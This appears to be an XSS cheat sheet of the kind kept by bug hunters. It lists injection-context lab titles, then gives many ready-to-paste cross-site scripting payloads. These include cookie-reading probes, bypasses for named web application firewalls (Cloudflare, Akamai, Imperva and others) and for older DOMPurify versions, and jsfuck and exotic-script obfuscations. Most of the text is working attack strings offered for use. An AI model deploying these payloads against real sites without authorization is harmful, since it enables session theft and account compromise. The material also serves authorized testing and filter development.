πΉSingle Reflection Using QUERY of URLπΉ
01 - HTML Injection (a)
02 - HTML Injection Inline with Double Quotes (b1)
03 - HTML Injection Inline with Single Quotes (b2)
04 - HTML Injection Inline with Double Quotes: No Tag Breaking (b3)
05 - HTML Injection Inline with Single Quotes: No Tag Breaking (b4)
06 - HTML Injection with Single Quotes in JS Block (c1)
07 - HTML Injection with Double Quotes in JS Block (c2)
08-JS Injection with Single Quotes (c3)
09-JS Injection with Double Quotes (c4)
10 - Escaped JS Injection with Single Quotes (c5)
11 - Escaped JS Injection with Double Quotes (c6)
12-JS Injection In Event Handler (No Handler Breaking)
13-JS Injection in Fully Validated Anchor (Href)
14-XML Injection with CDATA and Comment Breakout (p, q & r)
πΉSingle Reflection Using PATH of URL ("friendly URLs")πΉ
01 - HTML Injection Inline PHP_SELF
02 - HTML Injection 1 Level Deep
03 - HTML Injection 2 Levels Deep
04 - HTML Injection 3 Levels Deep
05 - HTML Injection in Script Block 1 Level Deep
06 - HTML Injection in Script Block 2 Levels Deep
07 - HTML Injection in Script Block 3 Levels Deep
08 - JS Injection in Script Block 1 Level Deep
09 - JS Injection in Script Block 2 Levels Deep
10 - JS Injection in Script Block 3 Levels Deep
πΉMulti ReflectionπΉ
01 - Double Injection in HTML Context with Double Quotes
02 - Double Injection in Mixed Context (HTML + JS) with Default Quotes
03 - Quoteless Inline Double Injection in JS variables
04 - Quoteless Inline Double Injection in JS object
05 - Quoteless Inline Double Injection in JS object with Nested Array
06 - Quoteless Inline Double Injection in JS object with Nested Function
πΉ Special CasesπΉ
01 - HTML Injection with Double Encoded Bypass
02 - HTML Injection with SQLi Error-Based *
03 - HTML Injection with PHP FILTER_VALIDATE_EMAIL Bypass
04 - HTML Injection with Strict-Length Input (32, 40 and 64 chars)
05 - HTML Injection with Strip-based Bypass (AFB)
06 - HTML Injection with Spell Checking Bypass
07 - HTML Injection with Base64 Encoded Input
08 - HTML Injection with Parameter Guessing
09 - HTML Injection in Parameter Name
10 - JS Injection with Single Quotes Fixing ReferenceError (also with Double Quotes and Escaped variations)
11 - Multi Context Injection with Bypass on Alpha-based Filter and JSON Encode Function (2 Different Entry Points)
12 - HTML Injection with CRLF in HTTP Header (Content-Type Replacement)
πΉDOM XSSπΉ
01 - DOM Injection via URL parameter (by server + client)
02 - DOM Injection via URL Parameter (Document Sink)
03 - DOM Injection via Open Redirection (Location Sink)
04 - DOM Injection via URL Parameter (Execution Sink)
05 - DOM Injection via AJAX in URL Fragment (Document Sink)
06 - DOM Injection via AngularJS Library versions 1.6.0+
07 - DOM Injection via Bootstrap Library versions 4.0.0, 4.1.0 and 4.1.1
πΉALWAYS ALERTπΉ
Check if your XSS triggers on a critical in scope domain not sandbox iframe or domain
Copy alert(document.domain)
alert(window.origin)
window.alert(1)
window.document.cookie.alert(1)
window.localStorage(1) Try it on:
URL query, fragment & path;
//ALERT: COOKIE
Copy with(document)alert(cookie) //ALERT: document.domain
Copy prompt`${document.domain}` πΉXSS Without parentheses ()πΉ
This repo contains XSS payloads that doesn't require parentheses
πΉBYPASS: WAFπΉ
//AWS
Copy <script>eval(atob(decodeURIComponent(confirm`1`)))</script> //Akamai => tough but flawed
Copy https://www.akamai.com/pt?x55=%22AutoFocus/%3E/OnFocus=top?.[%22ale%22%2B%22rt%22](1)/%22
https://brutelogic.com.br/gym.php?p08=%22AutoFocus/%3E/OnFocus=top?.[%22ale%22%2B%22rt%22](1)/%22
"AutoFocus/>/OnFocus=top?.["ale"+"rt"](1)/" //CloudFlare => child's play
Copy #.hta%253ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>
#../index.php/%2522%253E%253Ciframe/srcdoc=<script/src="'-alert(document.domain)-'"></script>/
β>-setTimeout`\u0028alert(document.domain)\u0029`-β
'-setTimeout`prompt\u0028document.domain\u0029`-'
"><BODy onbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
GET /search.html?ey272ayolocation.search=&q=�"><BODyonbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
"><BODyonbeforescriptexecute="x1='cookie';c=')';b='a';location='jav'+b+'script:con'+'fir\u006d('+'document'+'.'+x1+c">
JavaScript://%250Aalert?.(1)//
'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
\74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//X55.is\76-->
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg/onload={alert`1`}>
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
"><onx=[] onmouseover=prompt(1)>
%2sscript%2ualert()%2s/script%2u
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
<svg onload=alert%26%230000000040"1")>
<svg onload=prompt%26%230000000040document.domain)>
<svg onload=prompt%26%23x000000028;document.domain)>
<svg/onrandom=random onload=confirm(1)>
<video onnull=null onmouseover=confirm(1)>
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
<img ignored=() src=x onerror=prompt(1)>
<svg onx=() onload=(confirm)(1)>
<--`<img/src=` onerror=confirm``> --!>
<img src=x onerror="a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]](document.domain)">
<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x
'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
'"><img/src/onerror=.1|alert``>
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
//DOMPurify
Copy delete DOMPurify.isSupported
delete document.implementation.__proto__.createHTMLDocument
<2.1
<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img	src=1	onerror=alert(1)>">
<math><mtext><table><mglyph><style><![CDATA[</style><img title="]]></mglyph><img	src=1	onerror=alert(1)>">
<math><mtext><table><mglyph><style><!--</style><img title="--></mglyph><img src=1 onerror=alert(1)>">
<2.0.1
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<svg><p><style><a id="</style><img src=1 onerror=alert(1)>"></p></svg> //Cloudfront
Copy ">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>
"><--<img+src= "><svg/onload+alert(document.domain)>> --!> //Cloudbric
Copy <a69/onclick=[1].findIndex(alert)>pew //Comodo WAF
Copy <input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme //ModSecurity
Copy <a href="jav%0Dascript:alert(1)"> //Imperva=> always naive
Copy <input id='a'value='global'><input id='b'value='E'><input 'id='c'value='val'><input id='d'value='aler'><input id='e'value='t(documen'><input id='f'value='t.domain)'><svg+onload[\r\n]=$[a.value+b.value+c.value](d.value+e.value+f.value)>
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
<a69/onclick=write()>pew
<details/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"/open>
<svg onload\r\n=$.globalEval("al"+"ert()");>
<svg/onload=self[`aler`%2b`t`]`1`>
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object> //Sucuri=> narrow ways
BYPASS: 302
Copy ws://google.com"><svg/onload=alert(2)>
wss://google.com"><svg/onload=alert(2)>
resource://google.com"><svg/onload=alert(2)> BYPASS: 403 (Forbidden)
Reflected XSS on ???? via ?? patameter 404 Not Found hides something
Do bruteforce with FFUF and find 200 OK endpoint.
Do parameter fuzzing with Arjun.
That parameter with vulnerable to XSS.
BYPASS: 429 (Too Many Requests)
BYPASS: Captcha (Google reCAPTCHA)
BYPASS: Two-Factor Authentication
πΉENCODE PAYLOADπΉ
TRANSLATE JAVASCRIPT TO OTHER WRITING SYSTEMS.
//Encode: jsfuck
Copy [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
Copy [][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}+[]][+[]][+!+[]+!+[]+!+[]+!+[]]+[!![]+[]][+[]][+!+[]]+[!![]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]}$```//Function(alert(1)) //Encode: aurebesh
Copy https://aem1k.com/aurebesh.js/# //Encode: Katakana
Copy https://www.sljfaq.org/cgi/e2k.cgi
Copy javascript:([,γ¦,,,,γ’]=[]+{},[γ,γ,γ,γ»,,γ,γ,γ,,,γ]=[!!γ¦]+!γ¦+γ¦.γ¦)[γ=γ’+γ¦+γ+γ+γ+γ+γ+γ’+γ+γ¦+γ][γ](γ+γ+γ»+γ+γ+'(-~γ¦)')() //Encode: Lontara
Copy https://lingojam.com/Lontara
Copy α¨='',α¨=!α¨+α¨,α¨=!α¨+α¨,α¨=α¨+{},α¨=α¨[α¨++],α¨=α¨[α¨=α¨],α¨=++α¨+α¨,α¨
=α¨[α¨+α¨],α¨[α¨
+=α¨[α¨]+(α¨.α¨+α¨)[α¨]+α¨[α¨]+α¨+α¨+α¨[α¨]+α¨
+α¨+α¨[α¨]+α¨][α¨
](α¨[α¨]+α¨[α¨]+α¨[α¨]+α¨+α¨+"(α¨)")() //Encode: Cuneiform
Copy https://funtranslations.com/babylonian
Copy π='',πΊ=!π+π,π=!πΊ+π,πΊ=π+{},π=πΊ[π++],π=πΊ[π«=π],π=++π«+π,πΉ=πΊ[π«+π],πΊ[πΉ+=πΊ[π]+(πΊ.π+πΊ)[π]+π[π]+π+π+πΊ[π«]+πΉ+π+πΊ[π]+π][πΉ](π[π]+π[π«]+πΊ[π]+π+π+"(π)")()
Polyglot XSS
Copy jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e 
